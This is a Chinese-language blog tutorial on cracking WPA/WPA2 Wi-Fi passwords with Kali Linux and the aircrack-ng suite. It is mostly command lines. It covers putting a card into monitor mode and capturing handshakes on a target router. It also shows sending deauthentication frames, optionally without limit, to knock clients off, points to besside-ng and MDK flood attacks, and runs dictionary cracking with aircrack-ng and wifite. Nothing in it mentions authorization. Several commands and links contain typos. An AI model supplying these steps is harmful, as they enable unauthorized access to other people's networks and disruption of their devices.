Aircrack-ng 无线安全套件

Aircrack-ng 暴力破解WIFI

WEP 可以直接逻辑破解,现在几乎很少人去使用啦,在这里我就不说明了,主要就是要说是WPA\WPA2现在主流的暴力字典破解WIFI密码.

需要用到的工具
  1. Kali Linux 系统平台

这是一个专业\专门 用于做渗入的系统,在linux系统上 表现出色.
下载网站:https://www.kali.org/downloads/
教程网站:https://tools.kali.org/

  1. aircrack-ng 软件

这款软件也有Windwos版本,但是实测在Windwos的效果\速度 更差一点,所以使用linux平台更好一点.
官网:http://www.aircrack-ng.org/

  1. 可嗅探的无限网卡

去淘宝购买可以注入,监听,嗅探的网卡.

  1. 虚拟机(可选项)

使用VMware\VBOX虚拟机,安装kali


准备&步骤
  1. 首先需要让Kali安装监听网卡驱动,这样才可以正常使用.

    了解Linux编译源码(驱动)源码安装所需的依赖支持库

    sudo apt-get install linux-source 
    sudo apt-get install linux-headers-$(uname -r) 
    sudo apt-get install build-essential 
    sudo apt-get install gcc 
    sudo apt-get install bc 
    sudo apt-get install make 
    sudo apt-get install make-guile 
    sudo apt-get install zlib-devel  
    sudo apt-get install krb5-devel 
    sudo apt-get install gcc-multilib 
    sudo apt-get install python3 
    sudo apt-get install libpcap 
    sudo apt-get install dkms
    
     *驱动下载网站可以去[Gethub](https://gethub.com),访问慢则使用国内镜像网站([GitHub中文社区 (githubs.cn)](https://www.githubs.cn/)),或者使用[Gitee.com](https://gitee.com/)*
    
  2. linux 安装 aircrack-ng 软件
    sudo apt install aircrack-ng
    
  3. 首先我们要知道自己的无线网卡的名称
    sudo ifconfig # 查看所有网卡命令,无法使用安装net-tools 
    ip add show  # 查看网卡命令
    sudo iwconfig  # 查看无线网卡命令
    nmcli dev wifi # 扫描WiFi信号
    iwlist wlan0 scanning # 扫描WIFI信号
    iw dev wlan0 scan # 扫描WIFI信号
    

    那么查看了WIFI信息 我们需要留意的有WIFI的SSID MAC 以及CHANNEL, 可以将扫描的结果重定向至文件.

    nmcli dev wifi > ~/wifi.info # 重定向至文件.
    
  4. 那么在一切都就绪的情况下, 我们首相需要将网卡设置为监听模式,
    sudo airmon-ng start wlan0 # 开启网卡为监控模式,stop 可以关闭网卡模式.
    sudo airmon-ng # 查看网卡状态
    sudo ifconfig wlan0 restart # 重启网卡
    
  5. 抓包&干扰信号
    sudo airodump-ng wlan0 # 扫描WIFI信息
    sudo airodump-ng --bssid 34:CE:00:07:62:22 -c 3 -w ~/data wlan0 # 抓包例子
    
    # 如果抓包慢的话,可以使用信号干扰使路由和终端断开,然后终端用户重连会使抓包成功几率更高.
    sudo aireplay-ng -0 2 -a 04:95:E6:C3:14:A9 -c 38:01:46:8E:E5:20 wlan0 # 信号干扰
    
     	***抓取数据包** airodump-ng --bssid(路由MAC地址) --channel(信道) 3 --write /home/kali/passwd (保存数据文件) wlan0(网卡名)* ; 关于抓取数据包的((20220108061340-33mm11h "详细说明"))
    
     	***干扰信号** aireplay-ng -0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)-a (路由器BSSID) -c (指定强制断开的设备) wlan0(网卡名)*
    

    以上干扰无效可以尝试besside-ng工具来开断开路由连接,成为拒绝连接

    sudo bessids-ng -b BSSID wlan0mon # BSSID 终端MAC, 运行后程序会自动自动破解.
    

    💡除此之外可以使用MDK工具来洪水攻击路由,查看关于MDkx

  6. 字典破解
    sudo aircrack-ng -a 2 -w ~/passwd.txt ~/data.cap -l ~/savemage.txt # 破解例子
    

    说明 aircrack-ng -a 2 (-a 2 代表WPA模式) -w(表示写入文件0) ~/密码文件.txt 抓包文件.cap -l (表示密码保存) ~/保存密码.txt

     aircrack-ng 破解需要一定时间,根据字典大小和机器计算性能决定时间(顺序计算方式),但是可以多次破解,将字典文件分割成两个字典然后同时计算。
    

附:如果路由器设置使WEP模式可以使用wifite命令来操作,仅需几个命令就可以破解.

sudo wifite --wpa -dict /home/knife/passwd.txt # sudo wifite --wpa(指定wps类型) -dict(字典路径)+ /home/knife/passwd.txt

相关连接

无线攻击 (aircrack-ng.org)

posted @ 2022-05-31 06:53  edolf  阅读(575)  评论(0编辑  收藏  举报